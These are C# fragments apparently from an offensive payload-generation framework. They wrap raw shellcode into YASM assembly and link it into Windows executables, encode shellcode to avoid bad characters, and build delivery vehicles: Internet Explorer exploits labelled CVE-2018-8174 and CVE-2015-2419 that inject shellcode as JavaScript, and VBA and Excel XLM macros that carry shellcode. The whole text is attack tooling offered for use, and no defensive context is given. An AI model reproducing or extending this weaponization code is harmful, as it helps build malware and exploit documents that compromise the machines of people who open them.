private static IEnumerable <AssemblySourceFile <YASM> > CreateSource(IShellcode shellcode, string symbolname, string sectionName = null, bool?sectionWritable = null)
{
var sourceFiles = new List <AssemblySourceFile <YASM> >();
var shellcodeFilename = Utils.RandomString(10) + ".bin";
sourceFiles.Add(new AssemblySourceFile <YASM>(shellcode.Bytes, shellcodeFilename));
string sectionLine;
if (sectionName == null && !sectionWritable.HasValue)
{
sectionLine = "";//SECTION '{1}' {2} execute,read\r\n //sectionName, sectionWritable ? "write," : ""
}
else
{
sectionName = sectionName ?? ".text";
sectionLine = $"SECTION '{sectionName}'";
if (sectionWritable.HasValue && sectionWritable.Value)
{
sectionLine += " write, execute, read";
}
sectionLine += "\r\n";
}
var source = $"Global {symbolname}\r\n{sectionLine}{symbolname}:\r\n\tincbin '{shellcodeFilename}'";
sourceFiles.Add(new AssemblySourceFile <YASM>(source, Utils.RandomString(10) + ".asm"));
return(sourceFiles);
}
static Executable ShellcodeToExe(IShellcode shellcode, TargetArch targetArch)
{
switch (targetArch)
{
case TargetArch.x64:
{
var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad");
var staticLibrary = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
return(((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary));
}
case TargetArch.x86:
{
var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad");
var staticLibrary = ((IAssembler <YASM, Win32ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
var exe = ((ILinker <Win32ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);
return(exe);
}
default:
throw new Exception();
}
}
private static byte[] EncodeShellcode(IShellcode shellcode)
{
if (!ValidShellcodeArchs.Contains(shellcode.Arch))
{
throw new ArgumentException();
}
return(Utils.EncodeShellcode(shellcode.Bytes, shellcode.Arch, BadChars));
}
public RawShellcodeYasmAssemblySource(IShellcode shellcode, string symbolName, string sectionName = null, bool?sectionWritable = null)
: base(CreateSource(shellcode, symbolName, sectionName, sectionWritable))
{
SymbolName = symbolName;
}
// Note: payload might execute twice
public CVE_2018_8174(IShellcode shellcode) : base(string.Format(Template, Utils.TransformShellcode(shellcode.Bytes, shellcode.Arch, "js_le")))
{
}
public ShellcodeVbaMacro(IShellcode shellcode)
{
Shellcode = shellcode;
}
// Note: payload might fire twice
// IE Exploit (CVE-2015-2419)
public CVE_2015_2419(IShellcode shellcode) : base(string.Format(Template, Utils.BytesToJavaScriptArray(shellcode.Bytes)))
{
}
public ShellcodeXlmMacro(IShellcode shellcode) : base(ShellCodeToCellMatrix(EncodeShellcode(shellcode)), macroEnabled: true)
{
}
